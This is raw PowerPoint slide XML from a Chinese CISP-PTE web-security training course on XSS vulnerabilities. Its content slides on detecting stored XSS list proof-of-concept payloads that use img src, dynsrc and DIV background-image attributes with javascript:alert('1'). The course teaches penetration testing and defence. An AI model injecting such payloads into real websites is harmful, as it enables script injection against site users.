              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:fld id="{37E5D1F4-5835-4861-BEE9-F37CD80E098F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>页</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="11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iming>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" u="none" kern="120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49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文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="980729"/>
            <a:ext cx="10972800" cy="514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028" name="Picture 11" descr="E:\公司素材\公司LOGO\白色透明LOGO.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43933" y="6381751"/>
            <a:ext cx="127154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Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8976321" y="6571954"/>
            <a:ext cx="3202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en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>© 2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>谷安天下版权所有</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7344139" y="6571953"/>
            <a:ext cx="1531188" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B395237E-8500-4FE0-A669-5FCAC893D89F}" type="datetime8">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10/8/17 8:05 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364592" y="6571832"/>
            <a:ext cx="638316" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:fld id="{37E5D1F4-5835-4861-BEE9-F37CD80E098F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>页</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 11" descr="E:\公司素材\公司LOGO\白色透明LOGO.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43933" y="6381751"/>
            <a:ext cx="127154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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8976321" y="6571954"/>
            <a:ext cx="3202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en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>© 2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>谷安天下版权所有</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7344139" y="6571953"/>
            <a:ext cx="1531188" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B395237E-8500-4FE0-A669-5FCAC893D89F}" type="datetime8">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10/8/17 8:05 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364592" y="6571832"/>
            <a:ext cx="638316" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:fld id="{37E5D1F4-5835-4861-BEE9-F37CD80E098F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>页</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386468303"/>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iming>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" u="none" kern="120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hyperlink" Target="NULL" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="NULL" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="NUL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314" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2711451" y="3728369"/>
            <a:ext cx="6804025" cy="1932879"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>CISP-PTE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t> 安全基础</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="64C100"/>
              </a:solidFill>
              <a:cs typeface="Adobe 黑体 Std R"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13315" name="Picture 4" descr="E:\公司素材\公司LOGO\透明.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36" y="95251"/>
            <a:ext cx="16510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18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8185026" y="5877272"/>
            <a:ext cx="230346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0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="12700" indent="-12700"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110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="323433"/>
                </a:solidFill>
                <a:latin typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>主讲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323433"/>
                </a:solidFill>
                <a:latin typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="323433"/>
              </a:solidFill>
              <a:latin typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文新魏" panose="0201080004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如何检测存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>续</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标签属性跨站</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>第一种方法受挫后，黑客可能尝试利用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标签。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>'1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>dyn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('1')"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>结果是与之前相同</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565650" y="3485108"/>
            <a:ext cx="3060700" cy="1816100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183049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如何检测存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>续</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DIV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标签属性跨站</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标签外，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DIV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标签也可以利用。同样也是图片载入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;DIV STYLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="background-image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('1'))"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>结果是与之前相同</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565650" y="3485108"/>
            <a:ext cx="3060700" cy="1816100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2073703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如何检测存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>续</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标签属性的一些特点</a:t>
            </a:r>
